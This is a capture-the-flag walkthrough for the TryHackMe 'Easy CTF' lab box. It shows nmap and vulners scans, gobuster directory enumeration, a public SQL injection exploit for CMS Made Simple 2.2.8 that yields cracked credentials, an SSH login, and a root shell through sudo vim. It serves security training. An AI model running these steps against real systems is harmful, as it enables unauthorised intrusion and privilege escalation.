TryHackMe - Easy CTF
IP Address: 10.10.17.246
Port Scanning
Check all running ports of the given ip, -O (Detects the OS which is running), -sV (Determines the versions of services running)
sudo nmap -sV -O 10.10.17.246
Open Ports:
| Port | Service | Version |
|---|---|---|
| 21/tcp | FTP | vsftpd 3.0.3 |
| 80/tcp | HTTP | Apache httpd 2.4.18 ((Ubuntu)) |
| 2222/tcp | SSH | OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 |
NSE - Nmap Scripting Engine
NSE has premade scripts to automate a wide variety of networking tasks. Eg. nmap-vulners and vulscan
nmap --script nmap-vulners,vulscan --script-args vulscandb=scipvuldb.csv -sV -p22 1##.##.###.#21
nmap -sV --script vulners --script-args mincvss=5.0 10.10.17.246
- @args vulners.mincvss - Limit CVEs shown to those with this CVSS score or greater. CVEs is Common Vulnerabilities and Exposures
- CVSS is The Common Vulnerability Scoring System is a free and open industry standard for assessing the severity of computer system security vulnerabilities.
vulscan tutorial: https://github.com/scipag/vulscan
Directory Enumeration
Finding all paths of a website using a wordlist. In this instance we are using gobuster with a DirBuster word list.
gobuster dir -w /opt/node_modules/dirbuster/lists/directory-list-2.3-medium.txt -u http://10.10.248.51
| Flag | Description |
|---|---|
-u | Specify url |
-w | Link wordlist |
Result:
/simple/server-status(inaccessible)
SQL Injection
By visiting the /simple we can see that CMS Made Simple is being hosted, with a version of 2.2.8. Doing a simple google search for CVEs for this shows a vulnerability for remote SQL Injections prior to version 2.2.10.
The Details of the CVE can be found in: https://packetstormsecurity.com/files/152356/CMS-Made-Simple-SQL-Injection.html
There is code to run the SQL Injection in which we have to pass in a IP Address. Install required libraries and then run the application while passing in relevant data with flags.
python app.py -u http://10.10.248.51 --crack -w /opt/node_modules/dirbuster/lists/directory-list-2.3-medium.txt
After that you will recieve the following details:
[+] Salt for password found: 1dac0d92e9fa6bb2
[+] Username found: mitch
[+] Email found: admin@admin.com
[+] Password found: 0c01f4468bd75d7a84c7eb73846e8d96
[+] Password cracked: secret
Getting Access
Now you can login with these credentials using ssh but it is required to specify ssh port 2222, (not the normal port):
ssh mitch@10.10.248.51 -p 2222
We can now see the flag in the home directory: “G00d j0b, keep up!”
Privilege Escalation
Now using the command sudo -l, we can find out which user can run some applications witg root priviliges, and we can see that Mitch can use vim.
So we sudo open vim and get a shell by typing in :!sh to spawn a shell within vim that has root access.